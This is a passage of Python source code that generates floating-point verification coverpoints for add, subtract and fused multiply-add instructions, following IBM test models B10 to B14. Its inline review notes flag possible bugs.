    :type seed: int
    :return: list of coverpoint strings (rounding mode fixed to 0)

    Abstract Dataset Description:
        Operand1 = [Random Number]
        Operand2 = [A value smaller than -(op1.exp+4), All values in the range [-(op1.exp+4), (op1.exp+4)], A value larger than +(op1.exp+4)]

    Implementation:
        - The exponent values of operand 1 and operand 2 obey the shift defined above. The mantissa value is randomly chosen and appended with the exponent derived.
        - Simultaneously, we convert these numbers into their corresponding IEEE754 floating point formats.
        - These operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
        - Coverpoints are then appended with rounding mode 0 for that particular opcode.
    '''
    # Strip the precision suffix ("fadd.s" -> "fadd").
    opcode = opcode.split('.')[0]
    if flen == 32:
        ieee754_maxnorm = '0x1.7fffffp+127'
        maxnum = float.fromhex(ieee754_maxnorm)
        exp_max = 255
    elif flen == 64:
        maxdec = '1.7976931348623157e+308'
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        exp_max = 1023
    if N == -1:
        N = 2
    if seed == -1:
        # Fixed per-opcode seeds keep the generated coverpoints reproducible.
        if opcode in 'fadd':
            random.seed(0)
        elif opcode in 'fsub':
            random.seed(1)
    else:
        random.seed(seed)
    b10_comb = []
    comment = []
    # NOTE(review): range(1, N) produces N-1 sets, not the N the docstring
    # implies (default N=2 yields a single set) — confirm intent.
    for i in range(1,N):
        rs1 = random.uniform(1,maxnum/1000)
        rs2 = random.uniform(1,maxnum/1000)
        # NOTE(review): assumes str(rs1) uses scientific notation (contains
        # 'e'); a draw below ~1e16 would repr without an exponent and raise
        # IndexError — extremely unlikely over this range, but not impossible.
        rs1_exp = str(rs1).split('e')[1]
        # Binary exponent of rs2 forced below -(rs1's binary exponent + 4),
        # then converted back into a decimal-exponent string for float().
        rs2_exp = -1*random.randrange(int(math.log(pow(10,int(rs1_exp)),2))+4, exp_max)
        rs2_num = str(rs2).split('e')[0] + 'e' + str(int(math.log(pow(2,int(rs2_exp)),10)))
        b10_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2_num))))
        comment.append(' | Exponent = '+ str(rs2_exp) + ' --> A value smaller than -(p + 4)')
        # Sweep every shift value inside [-(p+4), +(p+4)].
        for j in range(-(int(math.log(pow(10,int(rs1_exp)),2))+4),+(int(math.log(pow(10,int(rs1_exp)),2))+4)):
            rs2_num = str(rs2).split('e')[0] + 'e' + str(int(math.log(pow(2,int(j)),10)))
            b10_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2_num))))
            comment.append(' | Exponent = '+ str(j) + ' --> Values in the range [-(p + 4) , (p + 4)]')
        # And one shift above +(p+4).
        rs2_exp = random.randrange(int(math.log(pow(10,int(rs1_exp)),2))+4, exp_max)
        rs2_num = str(rs2).split('e')[0] + 'e' + str(int(math.log(pow(2,int(rs2_exp)),10)))
        b10_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2_num))))
        comment.append(' | Exponent = '+ str(rs2_exp) + ' --> A value larger than (p + 4)')
    coverpoints = []
    k = 0
    for c in b10_comb:
        cvpt = ""
        for x in range(1, ops+1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += comment[k]
        coverpoints.append(cvpt)
        k += 1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
        (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B10 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b11(flen, opcode, ops, N=-1, seed=-1):
    '''
    IBM Model B11 Definition:
    In this model we test the combination of different shift values between the
    inputs, with special patterns in the significands of the inputs.
    Significands of Input1 and Input2: as in model (B9) "Special Significands on
    Inputs"
    Shift: as in model (B10) "Shift - Add"
    We test both effective operations: addition and subtraction.
    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int
    Abstract Dataset Description:
    Operand1, Operand2 ∈ Abstract Dataset in B9 + Abstract Dataset in B10
    Implementation:
    - A culmination of the techniques used in the implementations of Model B9 and Model B10 are used to form the dataset.
    - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
    - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    # Strip any precision suffix (e.g. 'fadd.s' -> 'fadd').
    opcode = opcode.split('.')[0]
    if flen == 32:
        flip_types = fzero + fone + fminsubnorm + fmaxsubnorm + fminnorm + fmaxnorm
        e_sz=8
        exp_max = 255
    elif flen == 64:
        flip_types = dzero + done + dminsubnorm + dmaxsubnorm + dminnorm + dmaxnorm
        e_sz=11
        exp_max = 1023
    # Deterministic per-opcode seeds keep the generated suite reproducible.
    if seed == -1:
        if opcode in 'fadd':
            random.seed(0)
        elif opcode in 'fsub':
            random.seed(1)
    else:
        random.seed(seed)
    rs1 = []
    b11_comb = []
    comment = []
    if ops == 2:
        # rs1 iterates over the special values (zeros, ones, min/max
        # subnormals, min/max normals) defined at module level.
        for i in range(len(flip_types)):
            rs1.append(flip_types[i])
        for i in range(len(rs1)):
            # Split the hex operand into sign / exponent / mantissa bit-strings.
            # The leading '1' guard digit preserves leading zero bits through int().
            bin_val = bin(int('1'+rs1[i][2:],16))[3:]
            rs1_sgn = bin_val[0]
            rs1_exp = bin_val[1:e_sz+1]
            rs1_man = bin_val[e_sz+1:]
            # --- Shift case 1: rs2 exponent far below rs1's --- #
            # NOTE(review): single-precision bias/limits (127, 131, 250) are
            # used below even when flen == 64 — confirm this is intended.
            if int(rs1_exp,2) < 4: rs2_exp = -127
            else : rs2_exp = random.randrange(-127,int(rs1_exp,2)-131)
            comment_str = ' | Exponent = '+ str(rs2_exp) + ' --> A value smaller than (p - 4)'
            rs2_exp += 127
            if flen == 32: rs2_exp = '{:08b}'.format(rs2_exp)
            elif flen == 64: rs2_exp = '{:011b}'.format(rs2_exp)
            # Special-significand patterns (model B9); each pattern is emitted
            # twice so it appears as rs2 and, swapped, as rs1.
            for j in range(len(rs1_man)):
                rs2_sgn = rs1_sgn
                rs2_man = '0'*j + rs1_man[j:] # Leading 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Leading zeroes ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Leading zeroes ---> rs1_man = '+rs2_man)
                rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Leading ones ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Leading ones ---> rs1_man = '+rs2_man)
                rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Trailing zeroes ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Trailing zeroes ---> rs1_man = '+rs2_man)
                rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Trailing ones ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Trailing ones ---> rs1_man = '+rs2_man)
            # NOTE(review): rs2_exp is overwritten with rs1_exp inside the two
            # loops below, so these patterns use rs1's exponent rather than the
            # shifted exponent described in comment_str — confirm intended.
            for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Long sequence of ones ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Long sequence of ones ---> rs1_man = '+rs2_man)
                rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Long sequence of zeroes ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Long sequence of zeroes ---> rs1_man = '+rs2_man)
            # Checkerboard-style repeating mantissa patterns, truncated to the
            # mantissa width (flen - e_sz - 1 bits).
            chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
            for j in chkrbrd:
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                rs2_man = j
                for k in range(math.ceil(len(rs1_man)/len(j))):
                    rs2_man += j
                rs2_man = rs2_man[0:flen-e_sz-1]
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Checkerboard pattern ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Checkerboard pattern ---> rs1_man = '+rs2_man)
            # --- Shift case 2: rs2 exponent far above rs1's --- #
            if int(rs1_exp,2) >= 250: rs2_exp = 127
            else : rs2_exp = random.randrange(int(rs1_exp,2)-123,127)
            comment_str = ' | Exponent = '+ str(rs2_exp) + ' --> A value greater than (p + 4)'
            rs2_exp += 127
            if flen == 32: rs2_exp = '{:08b}'.format(rs2_exp)
            elif flen == 64: rs2_exp = '{:011b}'.format(rs2_exp)
            # Same B9 pattern sweep as case 1, with the larger exponent.
            for j in range(len(rs1_man)):
                rs2_sgn = rs1_sgn
                rs2_man = '0'*j + rs1_man[j:] # Leading 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Leading zeroes ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Leading zeroes ---> rs1_man = '+rs2_man)
                rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Leading ones ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Leading ones ---> rs1_man = '+rs2_man)
                rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Trailing zeroes ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Trailing zeroes ---> rs1_man = '+rs2_man)
                rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Trailing ones ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Trailing ones ---> rs1_man = '+rs2_man)
            # NOTE(review): rs2_exp again overwritten with rs1_exp below.
            for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Long sequence of ones ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Long sequence of ones ---> rs1_man = '+rs2_man)
                rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Long sequence of zeroes ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Long sequence of zeroes ---> rs1_man = '+rs2_man)
            chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
            for j in chkrbrd:
                rs2_sgn = rs1_sgn
                rs2_exp = rs1_exp
                rs2_man = j
                for k in range(math.ceil(len(rs1_man)/len(j))):
                    rs2_man += j
                rs2_man = rs2_man[0:flen-e_sz-1]
                rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                comment.append(comment_str + ' | Checkerboard pattern ---> rs2_man = '+rs2_man)
                b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                comment.append(comment_str + ' | Checkerboard pattern ---> rs1_man = '+rs2_man)
            # --- Shift case 3: sweep every exponent in the window around rs1's
            # exponent, clamped to the representable range --- #
            ul = int(rs1_exp,2)-123
            ll = int(rs1_exp,2)-131
            if int(rs1_exp,2) >= 250: ul = 127
            if int(rs1_exp,2) < 4: ll = -127
            for expval in range (ll, ul):
                rs2_exp = expval
                comment_str = ' | Exponent = '+ str(rs2_exp) + ' --> Values in the range (p - 4) to (p + 4)'
                rs2_exp += 127
                if flen == 32: rs2_exp = '{:08b}'.format(rs2_exp)
                elif flen == 64: rs2_exp = '{:011b}'.format(rs2_exp)
                for j in range(len(rs1_man)):
                    rs2_sgn = rs1_sgn
                    rs2_man = '0'*j + rs1_man[j:] # Leading 0s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                    comment.append(comment_str + ' | Leading zeroes ---> rs2_man = '+rs2_man)
                    b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                    comment.append(comment_str + ' | Leading zeroes ---> rs1_man = '+rs2_man)
                    rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Leading 1s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                    comment.append(comment_str + ' | Leading ones ---> rs2_man = '+rs2_man)
                    b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                    comment.append(comment_str + ' | Leading ones ---> rs1_man = '+rs2_man)
                    rs2_man = rs1_man[0:j] + '0'*(len(rs1_man)-j) # Trailing 0s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                    comment.append(comment_str + ' | Trailing zeroes ---> rs2_man = '+rs2_man)
                    b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                    comment.append(comment_str + ' | Trailing zeroes ---> rs1_man = '+rs2_man)
                    rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Trailing 1s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                    comment.append(comment_str + ' | Trailing ones ---> rs2_man = '+rs2_man)
                    b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                    comment.append(comment_str + ' | Trailing ones ---> rs1_man = '+rs2_man)
                # NOTE(review): rs2_exp again overwritten with rs1_exp below,
                # so these entries do not vary with expval — confirm intended.
                for j in range(len(rs1_man)-math.ceil(0.1*len(rs1_man)),len(rs1_man)):
                    rs2_sgn = rs1_sgn
                    rs2_exp = rs1_exp
                    rs2_man = '1'*j + '0'*(len(rs1_man)-j) # Long sequence of 1s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                    comment.append(comment_str + ' | Long sequence of ones ---> rs2_man = '+rs2_man)
                    b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                    comment.append(comment_str + ' | Long sequence of ones ---> rs1_man = '+rs2_man)
                    rs2_man = '0'*j + '1'*(len(rs1_man)-j) # Long sequence of 0s
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                    comment.append(comment_str + ' | Long sequence of zeroes ---> rs2_man = '+rs2_man)
                    b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                    comment.append(comment_str + ' | Long sequence of zeroes ---> rs1_man = '+rs2_man)
                chkrbrd = ['011','110','0011','1100','0111','1000','010','101','0110','1001']
                for j in chkrbrd:
                    rs2_sgn = rs1_sgn
                    rs2_exp = rs1_exp
                    rs2_man = j
                    for k in range(math.ceil(len(rs1_man)/len(j))):
                        rs2_man += j
                    rs2_man = rs2_man[0:flen-e_sz-1]
                    rs2 = fields_dec_converter(flen,'0x'+hex(int('1'+rs2_sgn+rs2_exp+rs2_man,2))[3:])
                    b11_comb.append((rs1[i],floatingPoint_tohex(flen,rs2)))
                    comment.append(comment_str + ' | Checkerboard pattern ---> rs2_man = '+rs2_man)
                    b11_comb.append((floatingPoint_tohex(flen,rs2),rs1[i]))
                    comment.append(comment_str + ' | Checkerboard pattern ---> rs1_man = '+rs2_man)
    # Assemble coverpoint strings: per-operand field constraints, the rounding
    # mode, then a human-readable '#' comment describing the operands.
    coverpoints = []
    k = 0
    for c in b11_comb:
        cvpt = ""
        for x in range(1, ops+1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += comment[k]
        coverpoints.append(cvpt)
        k += 1
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
    (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B11 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b12(flen, opcode, ops, seed=-1):
    '''
    IBM Model B12 Definition:
    This model tests every possible value for cancellation.
    For the difference between the exponent of the intermediate result and the
    maximum between the exponents of the inputs, test all values in the range:
    [-p, +1].
    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int
    Abstract Dataset Description:
    Intermediate Result - Operand.Exp ∈ [-p, +1]
    Operand1 {operation} Operand2 = Intermediate Results
    Implementation:
    - rs1 and an intermediate result ``ir`` are drawn at random; rs2 is then solved for so that rs1 {op} rs2 == ir, which forces cancellation in the operation.
    - For flen == 64 the subtraction is carried out with Decimal (precision 40) so the derived rs2 is exact to double precision.
    - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
    - Coverpoints are then appended with rounding mode ‘0’ for that particular opcode.
    '''
    opcode = opcode.split('.')[0]
    # 40 significant digits keep the Decimal arithmetic below exact for doubles.
    getcontext().prec = 40
    if flen == 32:
        maxnum = float.fromhex('0x1.7fffffp+127')
        minsubnorm = float.fromhex('0x0.000001p-126')
    elif flen == 64:
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        minsubnorm = float.fromhex('0x0.0000000000001p-1022')
    # Deterministic per-opcode seeds keep the generated suite reproducible.
    if seed == -1:
        if opcode in 'fadd':
            random.seed(0)
        elif opcode in 'fsub':
            random.seed(1)
    else:
        random.seed(seed)
    b12_comb = []
    for i in range(50):
        # rs1's sign is chosen so that the operation is an effective
        # subtraction (cancellation) for both fadd and fsub.
        if opcode in 'fadd': rs1 = -1*random.uniform(minsubnorm,maxnum)
        elif opcode in 'fsub': rs1 = random.uniform(minsubnorm,maxnum)
        ir = random.uniform(1,maxnum)
        # Solve rs1 {op} rs2 == ir for rs2.
        if opcode in 'fadd':
            rs2 = ir - rs1 if flen == 32 else Decimal(ir) - Decimal(rs1)
        elif opcode in 'fsub':
            rs2 = rs1 - ir if flen == 32 else Decimal(rs1) - Decimal(ir)
        if opcode in ['fadd','fsub']:
            b12_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
    # Assemble coverpoint strings: per-operand field constraints, the rounding
    # mode, then a human-readable '#' comment describing the operands.
    coverpoints = []
    comment = ' | Add: Cancellation'
    for c in b12_comb:
        cvpt = ""
        for x in range(1, ops+1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        # Iterate over ops (previously hard-coded to 2) so the comment section
        # stays consistent with the 'y != ops' separator test below.
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += comment
        coverpoints.append(cvpt)
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
    (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B12 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b13(flen, opcode, ops, seed=-1):
    '''
    IBM Model B13 Definition:
    This model tests all combinations of cancellation values as in model (B12), with
    all possible unbiased exponent values of subnormal results.
    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
    :type flen: int
    :type opcode: str
    :type ops: int
    :type seed: int
    Abstract Dataset Description:
    Intermediate Result - Operand.Exp ∈ [-p, +1] (The exponent for the intermediate result is chosen such that it is a subnormal number)
    Operand1 {operation} Operand2 = Intermediate Results
    Implementation:
    - rs1 is drawn from the full normal/subnormal range while the intermediate result ``ir`` is drawn from the subnormal range only; rs2 is solved for so that rs1 {op} rs2 == ir.
    - For flen == 64 the subtraction is carried out with Decimal (precision 40) so the derived rs2 is exact to double precision.
    - The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
    - Coverpoints are then appended with all rounding modes for that particular opcode.
    '''
    opcode = opcode.split('.')[0]
    # 40 significant digits keep the Decimal arithmetic below exact for doubles.
    getcontext().prec = 40
    if flen == 32:
        maxnum = float.fromhex('0x1.7fffffp+127')
        minsubnorm = float.fromhex('0x0.000001p-126')
        maxsubnorm = float.fromhex('0x0.7fffffp-126')
    elif flen == 64:
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        minsubnorm = float.fromhex('0x0.0000000000001p-1022')
        maxsubnorm = float.fromhex('0x0.fffffffffffffp-1022')
    # Deterministic per-opcode seeds keep the generated suite reproducible.
    if seed == -1:
        if opcode in 'fadd':
            random.seed(0)
        elif opcode in 'fsub':
            random.seed(1)
    else:
        random.seed(seed)
    b13_comb = []
    for i in range(200):
        rs1 = random.uniform(minsubnorm,maxnum)
        # Target a subnormal intermediate result to exercise gradual underflow.
        ir = random.uniform(minsubnorm,maxsubnorm)
        # Solve rs1 {op} rs2 == ir for rs2.
        if opcode in 'fadd':
            rs2 = ir - rs1 if flen == 32 else Decimal(ir) - Decimal(rs1)
        elif opcode in 'fsub':
            rs2 = rs1 - ir if flen == 32 else Decimal(rs1) - Decimal(ir)
        if opcode in ['fadd','fsub']:
            b13_comb.append((floatingPoint_tohex(flen,float(rs1)),floatingPoint_tohex(flen,float(rs2))))
    # Assemble coverpoint strings: per-operand field constraints, the rounding
    # mode, then a human-readable '#' comment describing the operands.
    coverpoints = []
    comment = ' | Add: Cancellation ---> Subnormal result'
    for c in b13_comb:
        cvpt = ""
        # Iterate over ops (previously hard-coded to 2) so field extraction
        # matches the operand count, consistent with the sibling B-models.
        for x in range(1, ops+1):
            # cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
            cvpt += (extract_fields(flen,c[x-1],str(x)))
            cvpt += " and "
        cvpt += 'rm_val == 0'
        cvpt += ' # '
        for y in range(1, ops+1):
            cvpt += 'rs'+str(y)+'_val=='
            cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
            if(y != ops):
                cvpt += " and "
        cvpt += comment
        coverpoints.append(cvpt)
    mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
    (str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B13 for '+opcode+' !'
    logger.info(mess)
    coverpoints = comments_parser(coverpoints)
    return coverpoints
def ibm_b14(flen, opcode, ops, N=-1, seed=-1):
    '''
    IBM Model B14 Definition:
    This model tests every possible value for a shift between the addends of the multiply-add operation.
    For the difference between the unbiased exponent of the addend and the
    unbiased exponent of the result of the multiplication, test the following values:
    1. A value smaller than -(2* p + 1)
    2. All the values in the range [-(2*p +1), (p +1) ]
    3. A value larger than (p + 1)
    We test both effective operations: addition and subtraction. The end values tested are selected to be greater by one than the largest possible shift in which
    the smaller addend may affect the result.
    :param flen: Size of the floating point registers
    :param opcode: Opcode for which the coverpoints are to be generated
    :param ops: No. of Operands taken by the opcode
    :param N: No. of sets of coverpoints to be generated. (Predefined to -1. Set to 2)
    :param seed: Initial seed value of the random library. (Predefined to -1. Actual value is set with respect to the opcode calling the function)
    :type flen: int
    :type opcode: str
    :type ops: int
    :type N: int
    :type seed: int
    Abstract Dataset Description:
    Shift between the addends of the multiply-add operation = [ A value smaller than -(2* p + 1), All the values in the range [-(2*p +1), (p +1), A value larger than (p + 1) ] → Condition 1
    Operand 1, 2 = Random
    Operand 3 = Condition 1
    Implementation:
    - Operands 1 and 2 are randomly obtained; Operand 3 is derived by scaling a random significand with exponents that satisfy the shift conditions above.
    - Once the dataset is formed, these operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
    - Coverpoints are then appended with rounding mode ‘0’ for that particular opcode.
    '''
    opcode = opcode.split('.')[0]
    if flen == 32:
        maxnum = float.fromhex('0x1.7fffffp+127')
        exp_max = 127
        mant_bits = 23
        limnum = maxnum
    elif flen == 64:
        maxnum = float.fromhex('0x1.fffffffffffffp+1023')
        exp_max = 1022
        mant_bits = 52
        # Cap the random operands near 2^508 so that rs1*rs2 stays finite.
        limnum = float.fromhex('0x1.fffffffffffffp+507')
    if N == -1:
        N = 2
    # Deterministic per-opcode seeds keep the generated suite reproducible.
    if seed == -1:
        if opcode in 'fmadd':
            random.seed(0)
        elif opcode in 'fmsub':
            random.seed(1)
        elif opcode in 'fnmadd':
            random.seed(2)
        elif opcode in 'fnmsub':
            random.seed(3)
    else:
        random.seed(seed)
    b14_comb = []
    comment = []
    for i in range(1,N):
        rs1 = random.uniform(1,limnum)
        rs2 = random.uniform(1,limnum)
        rs3 = random.uniform(1,limnum)
        # Decimal exponent of the product, then mapped to a base-2 scale.
